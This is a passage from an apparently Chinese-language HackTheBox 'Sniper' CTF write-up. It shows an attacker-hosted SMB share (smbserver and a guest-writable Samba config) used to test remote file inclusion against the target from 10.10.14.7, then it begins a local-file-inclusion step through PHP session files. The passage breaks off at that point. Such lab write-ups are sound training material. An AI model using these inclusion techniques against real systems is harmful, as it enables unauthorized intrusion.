使用 smbserver 在本地开启 smb 服务,并在该目录下放置一个文本文件mac.txt,内容为mac is good,
python3 smbserver.py -smb2support mac ~/hackthebox/Machines/Sniper/
尝试请求远程文件地址:\\10.10.14.7\mac\mac.txt
成功请求到mac.txt当中的内容,查看响应发现靶机已向本地发送请求
如果 smb 服务建立出现问题也可以使用以下方式
vim /etc/samba/smb.conf
[mac]
path = /root/hackthebox/Machines/Sniper/
browseable = yes
read only = no
create mask = 777
guest ok = yes
force user = nobody
force group = nogroup
开启服务
service smbd restart
service nmbd restart
本地文件包含上线
在 Windows 中默认会话地址是\windows\temp目录,登陆账户后我们可以获取到 PHPSESSID
为8b23pbv8tj4m02qisnape584d8